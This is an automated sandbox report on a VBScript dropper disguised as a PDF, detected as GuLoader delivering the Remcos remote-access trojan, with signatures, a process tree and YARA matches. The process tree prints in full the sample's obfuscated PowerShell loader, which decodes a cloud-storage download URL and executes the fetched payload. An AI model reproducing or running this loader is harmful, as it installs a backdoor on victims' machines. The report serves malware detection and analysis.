Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DIR-A_JY4878249#U00b7pdf.vbs

Overview

General Information

Sample name:DIR-A_JY4878249#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name:DIR-A_JY4878249pdf.vbs
Analysis ID:1633353
MD5:093a38cc301b69676ffdc1b1929d289e
SHA1:63ed0e890211ffd8e2282ec72f96a4c1b0f91039
SHA256:eac5b3f6786c992c180f77bdd9d25932c80645d00038021a45b2981436d93c61
Tags:vbsuser-abuse_ch
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7036 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DIR-A_JY4878249#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 7136 cmdline: ping Host_6637.6637.6637.657e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6344 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Chairlift;function Opgrelsesdatoer($Perdricide){ .($Buenas) ($Perdricide)} function ampler($Envoyjcs){$Demineraliserings=4;do{$Yamshik+=$Envoyjcs[$Demineraliserings];$Demineraliserings+=5;$Tenebrosity=Format-List} until(!$Envoyjcs[$Demineraliserings])$Yamshik}$Meddelagtig=ampler 'Ho enSp jeSepaTOoph..nglW';$Meddelagtig+=ampler ' HereBldgBStudCCrocLIsoci ReaEF ignpseuT';$Marginellidae=ampler 'KravM sunoKampzVariiRacil Mullun aaKrad/';$Libretto=ampler 'Rec.TCerilDjersUnst1Dobb2';$trediveaarsfdselsdagene='Ki l[Sortn CeceS roTSamm.AmblS.emoe Klarsuppvtun IUp,lcSu.fE.awtpLoy o icaI K fNSibeTPar mL upa Tacn Pa asigggFaitE porR Esk]Cape:d fe:BlteSExigeAstrcBlafU Mi rNyanIDisitPaadY Sk PBirerCircoTinftSaldot.evcC.asOabyillabe= Udp$UdviLTortiO thbencar SpeEBlewTRu.dTWillO';$Marginellidae+=ampler 'Noni5 ui.Zaza0P da E.v(BuggWKommi Counomlad Endoaf,twAfsksKore GhetN DomTRa e T ks1Told0Upfu.Orch0 Kai;.mpe ,egeWTi.vi Ko,n fut6 Sta4Rube;Ps.u KvarxCald6Kuki4Skin;Posi GlacrDimnvFrmn:Effe1Ti e3Ext 4zinn. Mod0Pind)Fald osGHan ePushcAntikHydro Dor/ Ago2Cali0Tl.e1Terp0sa k0d if1Uafl0 D s1S gu LyssF Se,i Pirr.apie CorfSh noPeelx Ban/be.e1Tann3Seiz4 Sho. Una0';$Lygteples240=ampler 'KursUBarnsLongE BalrL.ng-SunrAGodkgUnsheO erNOve.T';$Garanteret=ampler 'ProdhTapetRicktPronp SabsUdvi:.ere/Co o/GasldFormr Ur,iC tovHoa e C n. ludgMi tolarvoAcangBrstlUnreeColo. blocWantoGen,mTy n/HernuBr tcKnar?Galoe TvixB trpba toRegnrRacitP la=VinddPlanoAl owSt.knK oklPebeoSheda geadHove&A kai UnbdViru=Envi1 dsdlobjeUTale6 Domo EroBEngarRos MBrd HBariW inET ar9Cha KOutamSpil-FjorjBa lnNaadgSyno8ChecETeatUKertzcapiPParcgFolkDRekrNTowp-Geos8.elvKWindgSev h op 8KalcM';$Lvfaldet=ampler 'mi.d>';$Buenas=ampler ' dgri .arELinjX';$Brugstyveriers='Flippermaskiner';$Bajerflasker='\Foremilks.sig';Opgrelsesdatoer (ampler 'Bulg$DratGGalilUndeOColoBTrilA ComL red:unwrDManciCompv KlaI Ta DStdpe ploRBamsEStan=flok$ CaveS.mtNStanVsub,:Gl caH.kep Vitp Sped OmrAFangtV poAArte+awin$UnjuBBoliaVandjVarmeGeorr S.cF NonlSus a SplSOverK Ca,E DkkR');Opgrelsesdatoer (ampler 'Or r$Saddg In LX,nook rrBParaaHylil H,r:ejerdOpilE SkoKRedeLUds,aPe.dmChopAAlliTAs liRes,o DisnLears Whin KreUAggrm SparF.rleRecitHapsSdest=Bsse$TegnGYuccaZophRDemaABragnSvent VseeK,onR yste HopTsabu.BiltSOvipp aikl BotISummTFibr(Blue$ we lBaarvMaxcF KvaaPortlSygedEmmee.nfeTSn g)');Opgrelsesdatoer (ampler $trediveaarsfdselsdagene);$Garanteret=$Deklamationsnumrets[0];$Multilobulated=(ampler ' Aut$ istgj hnllikvO hotBSwasa KralCont:Spo i AfbNStanf Mi oOreor Ve mCol,ACompT NomIC,enO PepNCo.rSDolldUnpoeR.sbL BessU.va=Fr sNG dsESkinW Gen- MelOPengBDiviJGrabeTraaC Mu Tgr,v TaarSEtaaYIsolSBallT Da,eSekuMLed .Cel $Datam Be ePr fd AtaD AlpeRingLHi eAVinegTammT MasI SmoG');Opgrelsesdatoer ($Multilobulated);Opgrelsesdatoer (ampler 'T,rs$Vir I KunnSelefUd,to S.erMikrmAfvraMavetFormiFainoK innJydesindedFinaeGob,l oods Slg. BalHHomoeAntiaB,oudEggpe T.arChefsMask[L.ng$Di.hLSloyyUncogIn,ot.etreSiv pVol lTribeT.rlsfl,k2 Beg4 B i0Obst]Apho= Out$LoevMRe haUltrrTyrogSpaciFriknBe reCumul.imilSne ibugfdNn oaA.tie');$Apsid=ampler 'Elem$OverI NednCzekfTretoAlderAgu,mS ofadob tCas iNoteo Tren AdosInfid Gr,eOverlSu es val.DermDSmr oDiphwStemn No.l Calo Apea En.d NeoFS peiparal ,jee Lin(Tedm$BonuGK,mia YazrFunkaR lenMbletKongeCarlrOmnieSkd,tPart, Gam$BeleP BureB mirpropo ublrArmvaCycltBetneSoi d Den)';$Perorated=$Dividere;Opgrelsesdatoer (ampler 'Chur$ utaG ephlD odoBallbMisaagillL hro:Donaf,nglIIh dnGregTC rke RegN TraD Teue Sp =Odde(Fo bTHelieflerSBrevtigno-El kpFormA.imitknalhRodt apo$ EmbP Te.ESupprS.evOH jarAlmeaGoattUnnoeCaloDTils)');while (!$Fintende) {Opgrelsesdatoer (ampler 'T ss$SkatgFl rlForao PosbPar a IaglDo t: F.lBSho.o tt.sStresAab iunaleuserr ive=Plem$AnilBFiliiJockgCo nbApp amealnNonvdBar,mPe.euAppos ScaiSortk ,eds') ;Opgrelsesdatoer $Apsid;Opgrelsesdatoer (ampler ' sol[TrauTS vkhFejlrDolkEShooa,remdAt aiCig.nTi pGBasa.KarttBesmhT abRForeE SmiAIntiD Beo]Fel,:C at:Fo sS P oLStikeLserE,torPRaff(impe4 Fra0Serf0Orme0Dfae)');Opgrelsesdatoer (ampler ' ema$ TypGE telRgtoOEkssbPedaAb.uglInti:Spr f eriPar nEnlit D kEunioNParrD,ravECath=Rev.(DiiptLedge ersSOpvit edh- ClopAabnaslutt U rHE eu Para$Gu,sP BygE R er SlgoSuttr MinAReprT OveeRak dFrds)') ;Opgrelsesdatoer (ampler 'Im o$MiliGGla lIndeOSofabUdd.AJasmL Geo:Releg olkAKaukmF.rear guCemalHOpgae Ax,bLiveEAffrn ZatkSmerLPro d ocELadrREksps Kaj1Isot4Fla 6S.ib=Le e$Sk aGStillBrndO AggBSkryAHam.LHjlp:Pre E D srAkamI eln IndDDrjeRSupeiHaanNOverGgglesChinF DecoMercrChefs StoKFolkYUnmuD CybnDel.i.dmiNF,rsgHjemEDvalrSubv+kenn+ Sko%Skri$Rattd RekEU bakCamblMisvaSandM CoaAD,sctb,drIS atO Unkn staSLynlnR.spuRedum.lluR odiE canTIndfsSyda.SlevCR sto St.UNonmnMentT') ;$Garanteret=$Deklamationsnumrets[$Gamachebenklders146]}$Slevenes=344243;$Brnevrnenes241=30334;Opgrelsesdatoer (ampler ' I,e$PortG NeolSubtoByggbJsseA,aallLa,i:S.arFPintLLannAUn iR LegE,andDPred Hur= ,pe alarg ForE kaftKlin- CoucStvnoCalaNRenst StrE,epaNDybbTValg orl$Planp S.aeOe,oRFulmo AntRHymeAFalsTIncoE PreD');Opgrelsesdatoer (ampler 'unfa$sulcgPhenlIn eoKon bRecoaMisblPaus:T rbU .runNeroc Ro rElekyGeo.sRigst Foraou,slpa.hl Un i DouzVol aBlodbD kliAnarlNetciStudtTholiTetaeWe es hol Fort= H,l Ub,[HairS SkyyAmats Avlt ObeePlanmAnas.NonaCEn aoFarenKoncvMe te Fifr Timt an ] en:yell:GymnFPar.r DanoTim,mVejtBBlaaa t.rsTw geOutl6Estu4 ribSPrmitB.ckrFortiPortnKrypgHum.(Debi$BebrFBentl NonaBeylrunsheLed dBabk)');Opgrelsesdatoer (ampler 'Inte$OverG M gLHalvoSippbzoonaSm aL Lsk:forepSaldR FelOd sscPsy,EOv.rLUdstLGennAkompRTa,bIRinoIA.sgDGenaATr neData Grac=P,ni Wras[ .loSLighyPreesunviTDiffeXenom ,ab.Non tDuelehulkxCliot als. E cEL.niNNongC JarORecodpolyIencon LangD,me]apti:Blik:Sm,gabaglSStraCV.loI H ii Sta. BulG npleNewsT K.uSPiskTProfRTapaiAd.lnNyfaGSc p(Libg$BonduDo sN He,cK.llRConay V ssReletInspaPiquL.ktilGardiL ftZR giAFrembHjdeI Spil AmoIEta.tSubciBemyEAk.is S.b)');Opgrelsesdatoer (ampler ' key$ LeeGImb lE.goOTormb EroAAd uL Fue:RuneSPoemPBr dl TroESchcJSa,gsReinePocunensoe lob=Thra$C,llP .sarFle ooverc QuaeKommLTarvL Troa DmoRDiplIsan ID agDSpndaPal eAnth.VariSFarmUMah bLobos ntiTUddarTeali.angnHugngFisk(Vel $CompSStylLPulsEOpslvReacekamenSleeeVoldsC ll,Hval$Strab Seer Ho.n L.nEE ekv.oisr O.tNM.xoeUk.rnCoroEHer SHair2Efte4 .el1 Epi)');Opgrelsesdatoer $Splejsene;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 4604 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • powershell.exe (PID: 5904 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Chairlift;function Opgrelsesdatoer($Perdricide){ .($Buenas) ($Perdricide)} function ampler($Envoyjcs){$Demineraliserings=4;do{$Yamshik+=$Envoyjcs[$Demineraliserings];$Demineraliserings+=5;$Tenebrosity=Format-List} until(!$Envoyjcs[$Demineraliserings])$Yamshik}$Meddelagtig=ampler 'Ho enSp jeSepaTOoph..nglW';$Meddelagtig+=ampler ' HereBldgBStudCCrocLIsoci ReaEF ignpseuT';$Marginellidae=ampler 'KravM sunoKampzVariiRacil Mullun aaKrad/';$Libretto=ampler 'Rec.TCerilDjersUnst1Dobb2';$trediveaarsfdselsdagene='Ki l[Sortn CeceS roTSamm.AmblS.emoe Klarsuppvtun IUp,lcSu.fE.awtpLoy o icaI K fNSibeTPar mL upa Tacn Pa asigggFaitE porR Esk]Cape:d fe:BlteSExigeAstrcBlafU Mi rNyanIDisitPaadY Sk PBirerCircoTinftSaldot.evcC.asOabyillabe= Udp$UdviLTortiO thbencar SpeEBlewTRu.dTWillO';$Marginellidae+=ampler 'Noni5 ui.Zaza0P da E.v(BuggWKommi Counomlad Endoaf,twAfsksKore GhetN DomTRa e T ks1Told0Upfu.Orch0 Kai;.mpe ,egeWTi.vi Ko,n fut6 Sta4Rube;Ps.u KvarxCald6Kuki4Skin;Posi GlacrDimnvFrmn:Effe1Ti e3Ext 4zinn. Mod0Pind)Fald osGHan ePushcAntikHydro Dor/ Ago2Cali0Tl.e1Terp0sa k0d if1Uafl0 D s1S gu LyssF Se,i Pirr.apie CorfSh noPeelx Ban/be.e1Tann3Seiz4 Sho. Una0';$Lygteples240=ampler 'KursUBarnsLongE BalrL.ng-SunrAGodkgUnsheO erNOve.T';$Garanteret=ampler 'ProdhTapetRicktPronp SabsUdvi:.ere/Co o/GasldFormr Ur,iC tovHoa e C n. ludgMi tolarvoAcangBrstlUnreeColo. blocWantoGen,mTy n/HernuBr tcKnar?Galoe TvixB trpba toRegnrRacitP la=VinddPlanoAl owSt.knK oklPebeoSheda geadHove&A kai UnbdViru=Envi1 dsdlobjeUTale6 Domo EroBEngarRos MBrd HBariW inET ar9Cha KOutamSpil-FjorjBa lnNaadgSyno8ChecETeatUKertzcapiPParcgFolkDRekrNTowp-Geos8.elvKWindgSev h op 8KalcM';$Lvfaldet=ampler 'mi.d>';$Buenas=ampler ' dgri .arELinjX';$Brugstyveriers='Flippermaskiner';$Bajerflasker='\Foremilks.sig';Opgrelsesdatoer (ampler 'Bulg$DratGGalilUndeOColoBTrilA ComL red:unwrDManciCompv KlaI Ta DStdpe ploRBamsEStan=flok$ CaveS.mtNStanVsub,:Gl caH.kep Vitp Sped OmrAFangtV poAArte+awin$UnjuBBoliaVandjVarmeGeorr S.cF NonlSus a SplSOverK Ca,E DkkR');Opgrelsesdatoer (ampler 'Or r$Saddg In LX,nook rrBParaaHylil H,r:ejerdOpilE SkoKRedeLUds,aPe.dmChopAAlliTAs liRes,o DisnLears Whin KreUAggrm SparF.rleRecitHapsSdest=Bsse$TegnGYuccaZophRDemaABragnSvent VseeK,onR yste HopTsabu.BiltSOvipp aikl BotISummTFibr(Blue$ we lBaarvMaxcF KvaaPortlSygedEmmee.nfeTSn g)');Opgrelsesdatoer (ampler $trediveaarsfdselsdagene);$Garanteret=$Deklamationsnumrets[0];$Multilobulated=(ampler ' Aut$ istgj hnllikvO hotBSwasa KralCont:Spo i AfbNStanf Mi oOreor Ve mCol,ACompT NomIC,enO PepNCo.rSDolldUnpoeR.sbL BessU.va=Fr sNG dsESkinW Gen- MelOPengBDiviJGrabeTraaC Mu Tgr,v TaarSEtaaYIsolSBallT Da,eSekuMLed .Cel $Datam Be ePr fd AtaD AlpeRingLHi eAVinegTammT MasI SmoG');Opgrelsesdatoer ($Multilobulated);Opgrelsesdatoer (ampler 'T,rs$Vir I KunnSelefUd,to S.erMikrmAfvraMavetFormiFainoK innJydesindedFinaeGob,l oods Slg. BalHHomoeAntiaB,oudEggpe T.arChefsMask[L.ng$Di.hLSloyyUncogIn,ot.etreSiv pVol lTribeT.rlsfl,k2 Beg4 B i0Obst]Apho= Out$LoevMRe haUltrrTyrogSpaciFriknBe reCumul.imilSne ibugfdNn oaA.tie');$Apsid=ampler 'Elem$OverI NednCzekfTretoAlderAgu,mS ofadob tCas iNoteo Tren AdosInfid Gr,eOverlSu es val.DermDSmr oDiphwStemn No.l Calo Apea En.d NeoFS peiparal ,jee Lin(Tedm$BonuGK,mia YazrFunkaR lenMbletKongeCarlrOmnieSkd,tPart, Gam$BeleP BureB mirpropo ublrArmvaCycltBetneSoi d Den)';$Perorated=$Dividere;Opgrelsesdatoer (ampler 'Chur$ utaG ephlD odoBallbMisaagillL hro:Donaf,nglIIh dnGregTC rke RegN TraD Teue Sp =Odde(Fo bTHelieflerSBrevtigno-El kpFormA.imitknalhRodt apo$ EmbP Te.ESupprS.evOH jarAlmeaGoattUnnoeCaloDTils)');while (!$Fintende) {Opgrelsesdatoer (ampler 'T ss$SkatgFl rlForao PosbPar a IaglDo t: F.lBSho.o tt.sStresAab iunaleuserr ive=Plem$AnilBFiliiJockgCo nbApp amealnNonvdBar,mPe.euAppos ScaiSortk ,eds') ;Opgrelsesdatoer $Apsid;Opgrelsesdatoer (ampler ' sol[TrauTS vkhFejlrDolkEShooa,remdAt aiCig.nTi pGBasa.KarttBesmhT abRForeE SmiAIntiD Beo]Fel,:C at:Fo sS P oLStikeLserE,torPRaff(impe4 Fra0Serf0Orme0Dfae)');Opgrelsesdatoer (ampler ' ema$ TypGE telRgtoOEkssbPedaAb.uglInti:Spr f eriPar nEnlit D kEunioNParrD,ravECath=Rev.(DiiptLedge ersSOpvit edh- ClopAabnaslutt U rHE eu Para$Gu,sP BygE R er SlgoSuttr MinAReprT OveeRak dFrds)') ;Opgrelsesdatoer (ampler 'Im o$MiliGGla lIndeOSofabUdd.AJasmL Geo:Releg olkAKaukmF.rear guCemalHOpgae Ax,bLiveEAffrn ZatkSmerLPro d ocELadrREksps Kaj1Isot4Fla 6S.ib=Le e$Sk aGStillBrndO AggBSkryAHam.LHjlp:Pre E D srAkamI eln IndDDrjeRSupeiHaanNOverGgglesChinF DecoMercrChefs StoKFolkYUnmuD CybnDel.i.dmiNF,rsgHjemEDvalrSubv+kenn+ Sko%Skri$Rattd RekEU bakCamblMisvaSandM CoaAD,sctb,drIS atO Unkn staSLynlnR.spuRedum.lluR odiE canTIndfsSyda.SlevCR sto St.UNonmnMentT') ;$Garanteret=$Deklamationsnumrets[$Gamachebenklders146]}$Slevenes=344243;$Brnevrnenes241=30334;Opgrelsesdatoer (ampler ' I,e$PortG NeolSubtoByggbJsseA,aallLa,i:S.arFPintLLannAUn iR LegE,andDPred Hur= ,pe alarg ForE kaftKlin- CoucStvnoCalaNRenst StrE,epaNDybbTValg orl$Planp S.aeOe,oRFulmo AntRHymeAFalsTIncoE PreD');Opgrelsesdatoer (ampler 'unfa$sulcgPhenlIn eoKon bRecoaMisblPaus:T rbU .runNeroc Ro rElekyGeo.sRigst Foraou,slpa.hl Un i DouzVol aBlodbD kliAnarlNetciStudtTholiTetaeWe es hol Fort= H,l Ub,[HairS SkyyAmats Avlt ObeePlanmAnas.NonaCEn aoFarenKoncvMe te Fifr Timt an ] en:yell:GymnFPar.r DanoTim,mVejtBBlaaa t.rsTw geOutl6Estu4 ribSPrmitB.ckrFortiPortnKrypgHum.(Debi$BebrFBentl NonaBeylrunsheLed dBabk)');Opgrelsesdatoer (ampler 'Inte$OverG M gLHalvoSippbzoonaSm aL Lsk:forepSaldR FelOd sscPsy,EOv.rLUdstLGennAkompRTa,bIRinoIA.sgDGenaATr neData Grac=P,ni Wras[ .loSLighyPreesunviTDiffeXenom ,ab.Non tDuelehulkxCliot als. E cEL.niNNongC JarORecodpolyIencon LangD,me]apti:Blik:Sm,gabaglSStraCV.loI H ii Sta. BulG npleNewsT K.uSPiskTProfRTapaiAd.lnNyfaGSc p(Libg$BonduDo sN He,cK.llRConay V ssReletInspaPiquL.ktilGardiL ftZR giAFrembHjdeI Spil AmoIEta.tSubciBemyEAk.is S.b)');Opgrelsesdatoer (ampler ' key$ LeeGImb lE.goOTormb EroAAd uL Fue:RuneSPoemPBr dl TroESchcJSa,gsReinePocunensoe lob=Thra$C,llP .sarFle ooverc QuaeKommLTarvL Troa DmoRDiplIsan ID agDSpndaPal eAnth.VariSFarmUMah bLobos ntiTUddarTeali.angnHugngFisk(Vel $CompSStylLPulsEOpslvReacekamenSleeeVoldsC ll,Hval$Strab Seer Ho.n L.nEE ekv.oisr O.tNM.xoeUk.rnCoroEHer SHair2Efte4 .el1 Epi)');Opgrelsesdatoer $Splejsene;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 5532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7328 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7492 cmdline: "C:\Windows\System32\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000E.00000002.1650896960.0000000008480000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000010.00000002.1795056108.00000000083FA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000E.00000002.1634500880.00000000057C5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        0000000E.00000002.1651117439.000000000C0B1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000004.00000002.1323764875.00000217997CD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            amsi64_6344.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_6344.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xfdcb:$b2: ::FromBase64String(
              • 0xd11d:$s1: -join
              • 0x68c9:$s4: +=
              • 0x698b:$s4: +=
              • 0xabb2:$s4: +=
              • 0xcccf:$s4: +=
              • 0xcfb9:$s4: +=
              • 0xd0ff:$s4: +=
              • 0xf4a8:$s4: +=
              • 0xf528:$s4: +=
              • 0xf5ee:$s4: +=
              • 0xf66e:$s4: +=
              • 0xf844:$s4: +=
              • 0xf8c8:$s4: +=
              • 0xd939:$e4: Get-WmiObject
              • 0xdb28:$e4: Get-Process
              • 0xdb80:$e4: Start-Process
              amsi32_5904.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xa931:$b2: ::FromBase64String(
              • 0x99b5:$s1: -join
              • 0x3161:$s4: +=
              • 0x3223:$s4: +=
              • 0x744a:$s4: +=
              • 0x9567:$s4: +=
              • 0x9851:$s4: +=
              • 0x9997:$s4: +=
              • 0x139a2:$s4: +=
              • 0x13a22:$s4: +=
              • 0x13ae8:$s4: +=
              • 0x13b68:$s4: +=
              • 0x13d3e:$s4: +=
              • 0x13dc2:$s4: +=
              • 0xa1d1:$e4: Get-WmiObject
              • 0xa3c0:$e4: Get-Process
              • 0xa418:$e4: Start-Process
              • 0x1461d:$e4: Get-Process

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DIR-A_JY4878249#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DIR-A_JY4878249#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2528, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DIR-A_JY4878249#U00b7pdf.vbs", ProcessId: 7036, ProcessName: wscript.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 172.217.18.110, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7328, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49696
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DIR-A_JY4878249#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DIR-A_JY4878249#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2528, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DIR-A_JY4878249#U00b7pdf.vbs", ProcessId: 7036, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Chairlift;function Opgrelsesdatoer($Perdricide){ .($Buenas) ($Perdricide)} function ampler($Envoyjcs){$Demineraliserings=4;do{$Yamshik+=$Envoyjcs[$Demineraliserings];$Demineraliserings+=5;$Tenebrosity=Format-List} until(!$Envoyjcs[$Demineraliserings])$Yamshik}$Meddelagtig=ampler 'Ho enSp jeSepaTOoph..nglW';$Meddelagtig+=ampler ' HereBldgBStudCCrocLIsoci ReaEF ignpseuT';$Marginellidae=ampler 'KravM sunoKampzVariiRacil Mullun aaKrad/';$Libretto=ampler 'Rec.TCerilDjersUnst1Dobb2';$trediveaarsfdselsdagene='Ki l[Sortn CeceS roTSamm.AmblS.emoe Klarsuppvtun IUp,lcSu.fE.awtpLoy o icaI K fNSibeTPar mL upa Tacn Pa asigggFaitE porR Esk]Cape:d fe:BlteSExigeAstrcBlafU Mi rNyanIDisitPaadY Sk PBirerCircoTinftSaldot.evcC.asOabyillabe= Udp$UdviLTortiO thbencar SpeEBlewTRu.dTWillO';$Marginellidae+=ampler 'Noni5 ui.Zaza0P da E.v(BuggWKommi Counomlad Endoaf,twAfsksKore GhetN DomTRa e T ks1Told0Upfu.Orch0 Kai;.mpe ,egeWTi.vi Ko,n fut6 Sta4Rube;Ps.u KvarxCald6Kuki4Skin;Posi GlacrDimnvFrmn:Effe1Ti e3Ext 4zinn. Mod0Pind)Fald osGHan ePushcAntikHydro Dor/ Ago2Cali0Tl.e1Terp0sa k0d if1Uafl0 D s1S gu LyssF Se,i Pirr.apie CorfSh noPeelx Ban/be.e1Tann3Seiz4 Sho. Una0';$Lygteples240=ampler 'KursUBarnsLongE BalrL.ng-SunrAGodkgUnsheO erNOve.T';$Garanteret=ampler 'ProdhTapetRicktPronp SabsUdvi:.ere/Co o/GasldFormr Ur,iC tovHoa e C n. ludgMi tolarvoAcangBrstlUnreeColo. blocWantoGen,mTy n/HernuBr tcKnar?Galoe TvixB trpba toRegnrRacitP la=VinddPlanoAl owSt.knK oklPebeoSheda geadHove&A kai UnbdViru=Envi1 dsdlobjeUTale6 Domo EroBEngarRos MBrd HBariW inET ar9Cha KOutamSpil-FjorjBa lnNaadgSyno8ChecETeatUKertzcapiPParcgFolkDRekrNTowp-Geos8.elvKWindgSev h op 8KalcM';$Lvfaldet=ampler 'mi.d>';$Buenas=ampler ' dgri .arELinjX';$Brugstyveriers='Flippermaskiner';$Bajerflasker='\Foremilks.sig';Opgrelsesdatoer (ampler 'Bulg$DratGGalilUndeOColoBTrilA ComL red:unwrDManciCompv KlaI Ta DStdpe ploRBamsEStan=flok$ CaveS.mtNStanVsub,:Gl caH.kep Vitp Sped OmrAFangtV poAArte+awin$UnjuBBoliaVandjVarmeGeorr S.cF NonlSus a SplSOverK Ca,E DkkR');Opgrelsesdatoer (ampler 'Or r$Saddg In LX,nook rrBParaaHylil H,r:ejerdOpilE SkoKRedeLUds,aPe.dmChopAAlliTAs liRes,o DisnLears Whin KreUAggrm SparF.rleRecitHapsSdest=Bsse$TegnGYuccaZophRDemaABragnSvent VseeK,onR yste HopTsabu.BiltSOvipp aikl BotISummTFibr(Blue$ we lBaarvMaxcF KvaaPortlSygedEmmee.nfeTSn g)');Opgrelsesdatoer (ampler $trediveaarsfdselsdagene);$Garanteret=$Deklamationsnumrets[0];$Multilobulated=(ampler ' Aut$ istgj hnllikvO hotBSwasa KralCont:Spo i AfbNStanf Mi oOreor Ve mCol,ACompT NomIC,enO 